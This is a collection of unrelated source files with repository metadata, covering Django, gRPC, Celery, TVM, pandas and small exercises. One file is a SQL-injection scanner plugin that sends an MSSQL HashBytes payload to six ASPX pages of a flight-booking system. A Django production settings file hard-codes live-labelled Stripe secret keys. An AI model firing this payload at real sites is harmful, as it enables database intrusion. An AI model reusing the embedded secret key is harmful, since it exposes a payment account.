class Meta():
model = User
fields = ('username','email','password',)
class AlumniForm(forms.ModelForm):
class Meta():
model = Alumni
exclude = ('user_model',)
class LoginForm(forms.Form):
username = forms.CharField(max_length=264)
password = forms.CharField(widget = forms.PasswordInput())
|
[
"jaindhairya2001@gmail.com"
] |
jaindhairya2001@gmail.com
|
e946bbe4ccbf8914231a25812913ff77829d1f28
|
545afb3cfe89f82b558faa5b5b28c28b8e3effce
|
/venv/Lib/site-packages/grpc/_plugin_wrapping.py
|
6c925826d6f4cb8b3a86acd5ac23cf15ebe0b1e0
|
[
"MIT"
] |
permissive
|
parthpankajtiwary/keras-groundup
|
24ad45a4b872e6d77fff8a6f4a3a6d60124a0628
|
0df0844e7d9dca741fad0965761a12f72ee51f07
|
refs/heads/master
| 2022-11-09T22:34:35.716466
| 2019-10-01T11:01:59
| 2019-10-01T11:01:59
| 210,914,101
| 0
| 1
|
MIT
| 2022-10-25T06:47:55
| 2019-09-25T18:31:49
|
Python
|
UTF-8
|
Python
| false
| false
| 3,527
|
py
|
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import threading
import grpc
from grpc import _common
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)
class _AuthMetadataContext(
collections.namedtuple('AuthMetadataContext', (
'service_url',
'method_name',
)), grpc.AuthMetadataContext):
pass
class _CallbackState(object):
def __init__(self):
self.lock = threading.Lock()
self.called = False
self.exception = None
class _AuthMetadataPluginCallback(grpc.AuthMetadataPluginCallback):
def __init__(self, state, callback):
self._state = state
self._callback = callback
def __call__(self, metadata, error):
with self._state.lock:
if self._state.exception is None:
if self._state.called:
raise RuntimeError(
'AuthMetadataPluginCallback invoked more than once!')
else:
self._state.called = True
else:
raise RuntimeError(
'AuthMetadataPluginCallback raised exception "{}"!'.format(
self._state.exception))
if error is None:
self._callback(metadata, cygrpc.StatusCode.ok, None)
else:
self._callback(None, cygrpc.StatusCode.internal,
_common.encode(str(error)))
class _Plugin(object):
def __init__(self, metadata_plugin):
self._metadata_plugin = metadata_plugin
def __call__(self, service_url, method_name, callback):
context = _AuthMetadataContext(
_common.decode(service_url), _common.decode(method_name))
callback_state = _CallbackState()
try:
self._metadata_plugin(context,
_AuthMetadataPluginCallback(
callback_state, callback))
except Exception as exception: # pylint: disable=broad-except
_LOGGER.exception(
'AuthMetadataPluginCallback "%s" raised exception!',
self._metadata_plugin)
with callback_state.lock:
callback_state.exception = exception
if callback_state.called:
return
callback(None, cygrpc.StatusCode.internal,
_common.encode(str(exception)))
def metadata_plugin_call_credentials(metadata_plugin, name):
if name is None:
try:
effective_name = metadata_plugin.__name__
except AttributeError:
effective_name = metadata_plugin.__class__.__name__
else:
effective_name = name
return grpc.CallCredentials(
cygrpc.MetadataPluginCallCredentials(
_Plugin(metadata_plugin), _common.encode(effective_name)))
|
[
"parthpankajtiwary@gmail.com"
] |
parthpankajtiwary@gmail.com
|
7a4ccc2502dab8ff8f1958d5055642f4c92c18ce
|
bd9a09a3f1a8b2b5166c540ada93cc5b30591605
|
/scanner/plugins/cms/piaoyou/piaoyou_six2_sqli.py
|
eec921a1b177ff73dbc2f527350a99da77615bf5
|
[
"MIT"
] |
permissive
|
iceyhexman/onlinetools
|
3cb6e349fc30c515f96429abeab5fbcc430ac0cc
|
61f2df7ff8e6ad97ca7901728c3ab749679a2bd0
|
refs/heads/master
| 2023-08-06T19:31:51.328657
| 2022-10-28T04:01:38
| 2022-10-28T04:01:38
| 119,565,769
| 1,662
| 358
|
MIT
| 2023-03-31T14:34:13
| 2018-01-30T16:51:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,390
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: 票友机票预订系统6处SQL注入2(绕过)
referer: http://www.wooyun.org/bugs/wooyun-2015-0116851
author: Lucifer
description: multi sqli。
'''
import sys
import requests
class piaoyou_six2_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
urls = ["/Parmset/sms_mb_edit.aspx?id=1",
"/Sales/meb_edit.aspx?id=1",
"/Sales/meb_his.aspx?id=1",
"/Other/hotel_edit.aspx?id=1",
"/Visa/visa_edit.aspx?id=1",
"/Visa/gjqz_add.aspx?id=214"]
try:
for url in urls:
vulnurl = self.url + url + "AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
return "[+]存在票友机票预订系统SQL注入漏洞(绕过)...(高危)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = piaoyou_six2_sqli_BaseVerify(sys.argv[1])
testVuln.run()
|
[
"834430486@qq.com"
] |
834430486@qq.com
|
f0af40b807555df49c70d1410197dbfebf56faea
|
46d2bb5c6d2ea91ac8a3fda0168cc99501b1abe4
|
/middleware/client_test.py
|
23a21e179175a2942d8e6f0cd79747b4b0f65bdf
|
[
"Apache-2.0"
] |
permissive
|
Time1ess/VES
|
2fe0a1c3371e243a377ad6a31df5d3b4651ddf4d
|
fe608b8ae469f81cc23b1ea30f02a1e68fac13ee
|
refs/heads/master
| 2021-01-18T21:36:21.864535
| 2016-06-15T12:21:42
| 2016-06-15T12:21:42
| 52,199,990
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,793
|
py
|
#!/usr/bin/python
# coding:utf-8
# Author: David
# Email: youchen.du@gmail.com
# Created: 2016-04-04 14:10
# Last modified: 2016-04-11 10:01
# Filename: client_test.py
# Description:
import socket
import time
import sys
import select
from random import randint
def Check_Identity(data):
if data == "VES":
return True
return False
if not sys.argv[1]:
name = raw_input("Enter type(v for video,d for display):")
else:
name = sys.argv[1]
broad_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #
broad_sock.bind(('', 8089))
data = None
addr = None
while True:
data, addr = broad_sock.recvfrom(4096)
if Check_Identity(data) is True:
break
broad_sock.close()
host = addr[0]
print 'Get broadcast message from host:', host
port = 8090 if name == "v" else 8092
ss = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send socket
ss.connect((host, port))
client = None
if name == "v":
sr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sr.bind(('', 8091))
sr.listen(1)
client, addr = sr.accept()
print 'Get connected from middleware'
disconnected = False
while True:
if name == "v" and not disconnected:
rs, ws, es = select.select([client], [], [], 0.1)
for r in rs:
try:
msg = r.recv(4096)
disconnected = not msg
except:
disconnected = True
if r is client:
if disconnected:
print 'Middleware system disconnectd.'
break
else:
print '[Middleware msg] ', msg
try:
msg = repr(tuple([randint(0, 360) for x in xrange(3)]))
ss.send(msg)
except:
print 'Socket close.'
break
time.sleep(0.1)
|
[
"youchen.du@gmail.com"
] |
youchen.du@gmail.com
|
5e9365cd8fcdc3c33017a4fb7808aa0e14bf48f8
|
2e3e256bcc0086a61cbb0e082dc61290196e35d2
|
/dragon/common/custom_backend_auth.py
|
c06f172b49bf3edcc9fa4ad9cf008c2682719502
|
[
"Apache-2.0"
] |
permissive
|
miradam/openstack-workload-disaster-recovery
|
79dcdb15ebf95d89157751c750a5dbab1557b942
|
854a3952bb9278cc08017ada97ff150b12b1c687
|
refs/heads/master
| 2020-03-24T15:36:46.808591
| 2016-12-15T12:32:17
| 2016-12-15T12:32:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,087
|
py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2012, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Middleware for authenticating against custom backends.
"""
import logging
from dragon.openstack.common import local
from dragon.rpc import client as rpc_client
import webob.exc
LOG = logging.getLogger(__name__)
class AuthProtocol(object):
def __init__(self, app, conf):
self.conf = conf
self.app = app
def __call__(self, env, start_response):
"""
Handle incoming request.
Authenticate send downstream on success. Reject request if
we can't authenticate.
"""
LOG.debug('Authenticating user token')
context = local.store.context
engine = rpc_client.EngineClient()
authenticated = engine.authenticated_to_backend(context)
if authenticated:
return self.app(env, start_response)
else:
return self._reject_request(env, start_response)
def _reject_request(self, env, start_response):
"""
Redirect client to auth server.
:param env: wsgi request environment
:param start_response: wsgi response callback
:returns HTTPUnauthorized http response
"""
resp = webob.exc.HTTPUnauthorized("Backend authentication failed", [])
return resp(env, start_response)
def filter_factory(global_conf, **local_conf):
conf = global_conf.copy()
conf.update(local_conf)
def auth_filter(app):
return AuthProtocol(app, conf)
return auth_filter
|
[
"OSHRITF@il.ibm.com"
] |
OSHRITF@il.ibm.com
|
a216e6e27226559c893a544e64f063b65a73dc33
|
e3bbbb5018baad3cd2a2daf10e315a2e12aec974
|
/ichnaea/async/schedule.py
|
129cd2fffdcfed4b50627ec2d05e94d081463a88
|
[
"Apache-2.0"
] |
permissive
|
ingle/ichnaea
|
5980de0532b012af7e48fa89bad7516adb84d24e
|
ed467538b6e61cf7c7921cd4aacb32ee039d13aa
|
refs/heads/master
| 2021-01-17T14:23:32.369530
| 2016-01-12T20:29:38
| 2016-01-12T20:29:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,476
|
py
|
"""
Contains the `Celery Beat schedule
<http://celery.rtfd.org/en/latest/userguide/periodic-tasks.html>`_.
"""
from datetime import timedelta
from celery.schedules import crontab
from ichnaea.models import (
CellShard,
DataMap,
WifiShard,
)
def celerybeat_schedule(app_config):
"""Return the celery beat schedule as a dictionary."""
sections = app_config.sections()
schedule = {
# Monitoring
'monitor-queue-size': {
'task': 'ichnaea.data.tasks.monitor_queue_size',
'schedule': timedelta(seconds=60),
'options': {'expires': 57},
},
'monitor-api-users': {
'task': 'ichnaea.data.tasks.monitor_api_users',
'schedule': timedelta(seconds=600),
'options': {'expires': 570},
},
'monitor-api-key-limits': {
'task': 'ichnaea.data.tasks.monitor_api_key_limits',
'schedule': timedelta(seconds=600),
'options': {'expires': 570},
},
# Statistics
'update-statcounter': {
'task': 'ichnaea.data.tasks.update_statcounter',
'args': (1, ),
'schedule': crontab(minute=3),
'options': {'expires': 2700},
},
'update-statregion': {
'task': 'ichnaea.data.tasks.update_statregion',
'schedule': crontab(minute=5),
'options': {'expires': 2700},
},
# Data Pipeline
'schedule-export-reports': {
'task': 'ichnaea.data.tasks.schedule_export_reports',
'schedule': timedelta(seconds=8),
'options': {'expires': 15},
},
'update-cellarea': {
'task': 'ichnaea.data.tasks.update_cellarea',
'schedule': timedelta(seconds=8),
'args': (100, ),
'options': {'expires': 15},
},
'update-cellarea-ocid': {
'task': 'ichnaea.data.tasks.update_cellarea_ocid',
'schedule': timedelta(seconds=9),
'args': (100, ),
'options': {'expires': 15},
},
'update-score': {
'task': 'ichnaea.data.tasks.update_score',
'args': (250, ),
'schedule': timedelta(seconds=9),
'options': {'expires': 10},
},
}
for shard_id in CellShard.shards().keys():
schedule.update({
'update-cell-' + shard_id: {
'task': 'ichnaea.data.tasks.update_cell',
'schedule': timedelta(seconds=7),
'args': (500, shard_id),
'options': {'expires': 10},
}
})
for shard_id in DataMap.shards().keys():
schedule.update({
'update-datamap-' + shard_id: {
'task': 'ichnaea.data.tasks.update_datamap',
'args': (500, shard_id),
'schedule': timedelta(seconds=14),
'options': {'expires': 20},
},
})
for shard_id in WifiShard.shards().keys():
schedule.update({
'update-wifi-' + shard_id: {
'task': 'ichnaea.data.tasks.update_wifi',
'schedule': timedelta(seconds=6),
'args': (500, shard_id),
'options': {'expires': 10},
}
})
if 'assets' in sections and app_config.get('assets', 'bucket', None):
# only configure tasks if target bucket is configured
schedule.update({
'cell-export-full': {
'task': 'ichnaea.data.tasks.cell_export_full',
'schedule': crontab(hour=0, minute=13),
'options': {'expires': 39600},
},
'cell-export-diff': {
'task': 'ichnaea.data.tasks.cell_export_diff',
'schedule': crontab(minute=3),
'options': {'expires': 2700},
},
})
if 'import:ocid' in sections:
schedule.update({
'monitor-ocid-import': {
'task': 'ichnaea.data.tasks.monitor_ocid_import',
'schedule': timedelta(seconds=600),
'options': {'expires': 570},
},
'cell-import-external': {
'task': 'ichnaea.data.tasks.cell_import_external',
'args': (True, ),
'schedule': crontab(minute=52),
'options': {'expires': 2700},
},
})
return schedule
|
[
"hanno@hannosch.eu"
] |
hanno@hannosch.eu
|
8dd2e0625d7cddc0360585244105d243400bfd8c
|
62e58c051128baef9452e7e0eb0b5a83367add26
|
/x12/6010/504006010.py
|
f720a213c867cbaeb745d5d7e34ed4a67527b198
|
[] |
no_license
|
dougvanhorn/bots-grammars
|
2eb6c0a6b5231c14a6faf194b932aa614809076c
|
09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d
|
refs/heads/master
| 2021-05-16T12:55:58.022904
| 2019-05-17T15:22:23
| 2019-05-17T15:22:23
| 105,274,633
| 0
| 0
| null | 2017-09-29T13:21:21
| 2017-09-29T13:21:21
| null |
UTF-8
|
Python
| false
| false
| 844
|
py
|
from bots.botsconfig import *
from records006010 import recorddefs
syntax = {
'version': '00601',
'functionalgroup': 'CC',
}
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BGN', MIN: 1, MAX: 1},
{ID: 'N1', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'N2', MIN: 0, MAX: 2},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
{ID: 'PER', MIN: 0, MAX: 99999},
{ID: 'DTP', MIN: 0, MAX: 99999},
{ID: 'LM', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'LQ', MIN: 1, MAX: 99999},
]},
]},
{ID: 'REF', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'DTP', MIN: 0, MAX: 99999},
{ID: 'MSG', MIN: 0, MAX: 99999},
{ID: 'LM', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'LQ', MIN: 1, MAX: 99999},
]},
]},
{ID: 'SE', MIN: 1, MAX: 1},
]}
]
|
[
"doug.vanhorn@tagglogistics.com"
] |
doug.vanhorn@tagglogistics.com
|
9c0840e858c444ea844208b24a2948f9ad7256f6
|
aad4481e8a54e311982d638c1b42a86180726970
|
/examples/event-loop-stuff/timeout-clock.py
|
b5a2076df4b5ee032662cafab72effec9061d0ae
|
[
"Unlicense",
"Zlib"
] |
permissive
|
jiangguoqing/tkinter-tutorial
|
5639b11cfc2f339df3776410dbd7078ee07fac54
|
c6fee61ee915cf0894125e5b5eeb7249237d3a6b
|
refs/heads/master
| 2021-05-05T12:02:13.912298
| 2017-06-18T10:51:33
| 2017-06-18T10:51:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 443
|
py
|
import tkinter as tk
import time
# this must return soon after starting this
def change_text():
label['text'] = time.asctime()
# now we need to run this again after one second, there's no better
# way to do this than timeout here
root.after(1000, change_text)
root = tk.Tk()
label = tk.Label(root, text='0')
label.pack()
change_text() # don't forget to actually start it :)
root.geometry('200x200')
root.mainloop()
|
[
"akuviljanen17@gmail.com"
] |
akuviljanen17@gmail.com
|
cd515ac2fb82afb70c385e634c68f7f523290d90
|
1097ed333a4000634e68a590ee6ffc6129ae61e3
|
/287.寻找重复数.py
|
f7574fcf8c3ef85cc24ac1beab25979bd36b19d0
|
[
"MIT"
] |
permissive
|
AutuanLiu/Code-Storm2019
|
1bbe890c7ca0d033c32348173bfebba612623a90
|
8efc7c5475fd888f7d86c3b08a3c1c9e55c1ac30
|
refs/heads/master
| 2020-04-23T07:03:08.975232
| 2019-10-24T08:56:26
| 2019-10-24T08:56:26
| 170,995,032
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,679
|
py
|
#
# @lc app=leetcode.cn id=287 lang=python3
#
# [287] 寻找重复数
#
# https://leetcode-cn.com/problems/find-the-duplicate-number/description/
#
# algorithms
# Medium (60.60%)
# Likes: 246
# Dislikes: 0
# Total Accepted: 17.2K
# Total Submissions: 28.4K
# Testcase Example: '[1,3,4,2,2]'
#
# 给定一个包含 n + 1 个整数的数组 nums,其数字都在 1 到 n 之间(包括 1 和
# n),可知至少存在一个重复的整数。假设只有一个重复的整数,找出这个重复的数。
#
# 示例 1:
#
# 输入: [1,3,4,2,2]
# 输出: 2
#
#
# 示例 2:
#
# 输入: [3,1,3,4,2]
# 输出: 3
#
#
# 说明:
#
#
# 不能更改原数组(假设数组是只读的)。
# 只能使用额外的 O(1) 的空间。
# 时间复杂度小于 O(n^2) 。
# 数组中只有一个重复的数字,但它可能不止重复出现一次。
#
#
#
# 首先进行排序
# 遍历数组 如果下一个位置的数值和当前值相等 则重复
# class Solution:
# def findDuplicate(self, nums: List[int]) -> int:
# nums = sorted(nums) # 这里开辟了新的空间 存储副本
# n = len(nums)
# for i in range(n-1):
# if nums[i] == nums[i + 1]:
# return nums[i]
# return -1
class Solution(object):
def findDuplicate(self, nums):
slow = 0
fast = 0
while True:
slow = nums[slow]
fast = nums[nums[fast]]
if slow == fast:
break
finder = 0
while True:
slow = nums[slow]
finder = nums[finder]
if slow == finder:
return slow
|
[
"autuanliu@163.com"
] |
autuanliu@163.com
|
56bb1b8a3d238c6c89226c5276b91e8649ac0852
|
660e3a2bb5f127908549d52ebc62d0d67725f832
|
/Algorithm_python/최소반복.py
|
289ccfc40280f63b62c7f53a788273646c84b529
|
[] |
no_license
|
dygksquf5/python_study
|
b56f8548bea7e31a484301bb97ddefe44d931c80
|
282126b0104dae9f9f8f63e613cc968a2f998ef1
|
refs/heads/master
| 2023-02-21T03:46:16.673962
| 2021-01-24T14:08:47
| 2021-01-24T14:08:47
| 294,593,923
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 742
|
py
|
# 주어진 수가 커서, 나머지 테스트케이스는 전부 에러ㅓㅓㅓ
def solution(arr):
answer = 0
id = [0] * len(set(str(arr)))
visited = [False] * len(id)
for i in range(len(arr)):
if not visited[arr[i] - 1]:
id[arr[i] - 1] = i
visited[arr[i] - 1] = True
continue
if visited[arr[i] - 1]:
answer = min(i - id[arr[i] - 1], id[arr[i] - 1])
id[arr[i] - 1] = max(i - id[arr[i] - 1], id[arr[i] - 1])
if answer == 0:
return -1
else:
return answer
# answer = []
# id = collections.defaultdict(list)
# for i in sorted(set(arr)):
# id[i] = [dup for dup in range(len(arr)) if arr[dup] == i]
|
[
"66229916+dygksquf5@users.noreply.github.com"
] |
66229916+dygksquf5@users.noreply.github.com
|
eb884160b46e9b642bf272c7dd14832b474646d7
|
b5e4958bd1c4770297108947e7b7441020b2e9cc
|
/topi/tests/python_cpp/test_topi_relu.py
|
f214266351210bcd11b71be64cdebdfc98b25ba6
|
[
"Apache-2.0"
] |
permissive
|
Markz2z/tvm
|
06a20dcdf76111b64242940323ba998432ffbffb
|
3921b938c2a14017c2624f149983e86a7f9a4e94
|
refs/heads/master
| 2021-09-07T22:13:37.234511
| 2018-02-27T23:14:58
| 2018-02-27T23:14:58
| 124,998,633
| 1
| 0
|
Apache-2.0
| 2018-03-13T05:45:19
| 2018-03-13T05:45:19
| null |
UTF-8
|
Python
| false
| false
| 2,070
|
py
|
"""Test code for relu activation"""
import os
import numpy as np
import tvm
import topi
from topi.util import get_const_tuple
def verify_relu(m, n, dtype):
A = tvm.placeholder((m, n), name='A', dtype=dtype)
B = topi.cpp.nn.relu(A)
assert B.dtype == dtype
a_np = np.random.uniform(size=get_const_tuple(A.shape)).astype(A.dtype)
b_np = a_np * (a_np > 0)
def check_device(device):
if not tvm.module.enabled(device):
print("Skip because %s is not enabled" % device)
return
print("Running on target: %s" % device)
target = topi.cpp.TEST_create_target(device)
if device == "llvm":
s = topi.cpp.generic.schedule_injective(target, [B])
else:
s = topi.cpp.cuda.schedule_injective(target, [B])
ctx = tvm.context(device, 0)
a = tvm.nd.array(a_np, ctx)
b = tvm.nd.array(np.zeros(get_const_tuple(B.shape), dtype=B.dtype), ctx)
foo = tvm.build(s, [A, B], device, name="relu")
foo(a, b)
np.testing.assert_allclose(b.asnumpy(), b_np, rtol=1e-5)
for device in ['cuda', 'opencl', 'metal', 'rocm']:
check_device(device)
def verify_leaky_relu(m, alpha):
A = tvm.placeholder((m,), name='A')
B = topi.cpp.nn.leaky_relu(A, alpha)
device = "llvm"
target = topi.cpp.TEST_create_target(device)
s = topi.cpp.generic.schedule_injective(target, [B])
a_np = np.random.uniform(size=get_const_tuple(A.shape)).astype(A.dtype)
b_np = a_np * (a_np > 0) + a_np * (a_np < 0) * alpha
ctx = tvm.cpu(0)
a = tvm.nd.array(a_np, ctx)
b = tvm.nd.array(np.zeros(get_const_tuple(B.shape), dtype=B.dtype), ctx)
foo = tvm.build(s, [A, B], device, name="leaky_relu")
foo(a, b)
np.testing.assert_allclose(b.asnumpy(), b_np, rtol=1e-5)
def test_relu():
for dtype in ['float32', 'float64', 'int32', 'int16', 'int8', 'int64']:
verify_relu(10, 128, dtype)
def test_leaky_relu():
verify_leaky_relu(100, 0.1)
if __name__ == "__main__":
test_relu()
test_leaky_relu()
|
[
"tqchen@users.noreply.github.com"
] |
tqchen@users.noreply.github.com
|
ed3556874e717bbaf477fea4cadc0f06772d039c
|
5e324af46c554b88b97ee26886b05c88457ff0f5
|
/core/settings/production.py
|
0514fd109ac361f269a79a6f0a4dcb5a3202ba61
|
[] |
no_license
|
doubleclickdetroit/dindintonight
|
1bda8851e49782d4dc16ca77d46e4b1f431c2b52
|
9769e1a96730b02511d25af8828b075dff5c35b5
|
refs/heads/master
| 2016-08-04T22:01:08.083566
| 2014-07-26T18:58:58
| 2014-07-26T18:58:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,383
|
py
|
"""Production settings and globals."""
from os import environ
from base import *
# Normally you should not import ANYTHING from Django directly
# into your settings, but ImproperlyConfigured is an exception.
from django.core.exceptions import ImproperlyConfigured
def get_env_setting(setting):
""" Get the environment setting or return exception """
try:
return environ[setting]
except KeyError:
error_msg = "Set the %s env variable" % setting
raise ImproperlyConfigured(error_msg)
########## HOST CONFIGURATION
# See: https://docs.djangoproject.com/en/1.5/releases/1.5/#allowed-hosts-required-in-production
ALLOWED_HOSTS = []
########## END HOST CONFIGURATION
########## EMAIL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host
EMAIL_HOST = environ.get('EMAIL_HOST', 'smtp.gmail.com')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-password
EMAIL_HOST_PASSWORD = environ.get('EMAIL_HOST_PASSWORD', '')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-user
EMAIL_HOST_USER = environ.get('EMAIL_HOST_USER', 'your_email@example.com')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-port
EMAIL_PORT = environ.get('EMAIL_PORT', 587)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-subject-prefix
EMAIL_SUBJECT_PREFIX = '[%s] ' % SITE_NAME
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-use-tls
EMAIL_USE_TLS = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#server-email
SERVER_EMAIL = EMAIL_HOST_USER
########## END EMAIL CONFIGURATION
########## DATABASE CONFIGURATION
DATABASES = {}
########## END DATABASE CONFIGURATION
########## CACHE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#caches
CACHES = {}
########## END CACHE CONFIGURATION
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = get_env_setting('SECRET_KEY')
########## END SECRET CONFIGURATION
########## STRIPE CREDIT CARD PROCESSING
STRIPE_SECRET_KEY = 'sk_live_oTd6djTNRxCeURqgLUYgGLl3'
STRIPE_PUBLISHABLE_KEY = 'pk_live_8zQjpc9a3HnrLCYVttDDKTMh'
########## END STRIPE CREDIT CARD PROCESSING
|
[
"rgarrison3@gmail.com"
] |
rgarrison3@gmail.com
|
f1d0e4bc2bf2a727d168359cf8886cbca2f8e324
|
25ebc03b92df764ff0a6c70c14c2848a49fe1b0b
|
/daily/20190406/example_tinyloop/06generator.py
|
d865c30ed0ec9c763671dcf57f05205d0cd393bb
|
[] |
no_license
|
podhmo/individual-sandbox
|
18db414fafd061568d0d5e993b8f8069867dfcfb
|
cafee43b4cf51a321f4e2c3f9949ac53eece4b15
|
refs/heads/master
| 2023-07-23T07:06:57.944539
| 2023-07-09T11:45:53
| 2023-07-09T11:45:53
| 61,940,197
| 6
| 0
| null | 2022-10-19T05:01:17
| 2016-06-25T11:27:04
|
Python
|
UTF-8
|
Python
| false
| false
| 240
|
py
|
def f():
x = yield 1
print("@", x)
y = yield 2
print("@", y)
return x, y
itr = f()
v = next(itr)
print("!", v)
v = itr.send([v])
print("!", v)
try:
print(itr.send([v]))
except StopIteration as e:
print(e.args)
|
[
"ababjam61+github@gmail.com"
] |
ababjam61+github@gmail.com
|
f0c660265b92498d1ba0c1172e8fe861bbba7312
|
4649cce3d8da661ddb204428e21f714a502d36f9
|
/src/ensae_teaching_cs/faq/faq_pandas.py
|
e7794b4e40526ab1f81f343648af19a2bd63b895
|
[
"MIT"
] |
permissive
|
xugonglei/ensae_teaching_cs
|
10a7b97003e7d833dd0faaae939813bf1e134575
|
f06d4ce7ea24338b5b217f6c46ff7980eac7e653
|
refs/heads/master
| 2020-04-30T11:10:47.368520
| 2015-10-29T21:41:23
| 2015-10-29T21:41:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,936
|
py
|
# -*- coding: utf-8 -*-
"""
@file
@brief Quelques problèmes récurrents avec `pandas <http://pandas.pydata.org/>`_.
"""
def read_csv(filepath_or_buffer, encoding="utf8", sep="\t", **args):
"""
Calls function `read_csv <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_csv.html?highlight=read_csv#pandas.read_csv>`_
with different defaults values. If the encoding is utf8 and the data is a file name, the function
checks there is no BOM at the beginning. Otherwise, it uses the encoding ``utf-8-sig``.
@param encoding encoding
@param filepath_or_buffer filepath_or_buffer
@param sep column separator
@return DataFrame
@FAQ(pandas___Caractères bizarres en utf8 et sous Windows (BOM) ?)
.. index:: encoding, BOM, UTF8
Sous Windows, certains logiciels comme `Notepad <http://fr.wikipedia.org/wiki/Bloc-notes_%28Windows%29>`_
permettent d'enregister un fichier sous différents `encodings <http://en.wikipedia.org/wiki/Character_encoding>`_.
Avec l'encoding `UTF8 <http://fr.wikipedia.org/wiki/UTF-8>`_, on a parfois un problème avec le premier caractère
``\\ufeff`` car Notepad ajoute ce qu'on appelle un `BOM <http://fr.wikipedia.org/wiki/Indicateur_d%27ordre_des_octets>`_.
Par exemple ::
import pandas
df = pandas.read_csv("dataframe.txt",sep="\\t", encoding="utf8")
print(df)
Provoque une erreur des plus énervantes ::
UnicodeEncodeError: 'charmap' codec can't encode character '\\ufeff' in position 0: character maps to <undefined>
Pour contrecarrer ceci, il suffit de modifier l'encoding par `utf-8-sig <https://docs.python.org/3.4/library/codecs.html#encodings-and-unicode>`_ ::
import pandas
df = pandas.read_csv("dataframe.txt",sep="\\t", encoding="utf-8-sig")
print(df)
@endFAQ
"""
import pandas
if isinstance(filepath_or_buffer, str):
if encoding in ["utf8", "utf-8"]:
try:
df = pandas.read_csv(
filepath_or_buffer,
encoding=encoding,
sep=sep,
**args)
if df.columns[0].startswith("\ufeff"):
raise UnicodeError(
"'charmap' codec can't encode characters in position 0-1325: character maps to <undefined>")
return df
except UnicodeError:
df = pandas.read_csv(
filepath_or_buffer,
encoding="utf-8-sig",
sep=sep,
**args)
return df
except UnicodeDecodeError:
df = pandas.read_csv(
filepath_or_buffer,
encoding="utf-8-sig",
sep=sep,
**args)
return df
else:
return pandas.read_csv(
filepath_or_buffer, encoding=encoding, sep=sep, **args)
else:
return pandas.read_csv(
filepath_or_buffer, encoding=encoding, sep=sep, **args)
def df_to_clipboard(df, **args):
"""
Copy a dataframe as csv text into the clipboard
@param df dataframe
@param sep by default the separator is ``\\t`` for this function until it is defined otherwise
It relies on method
`to_clipboard <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.to_clipboard.html>`_.
@FAQ(pandas___Copier un dataframe dans le presse-papier - clipboard)
Pour récupérer un dataframe dans Excel, on peut utiliser la méthode
`to_excel <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.to_excel.html>`_
puis ouvrir le fichier dans Excel ou le copier dans le presse-papier et le coller
dans une feuille ouverte dans Excel. C'est l'objet de la méthode
`to_clipboard <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.to_clipboard.html>`_ ::
df = pandas.DataFrame ( ... )
df.to_clipboard(sep="\\t")
@endFAQ
"""
if "sep" in args:
df.to_clipboard(**args)
else:
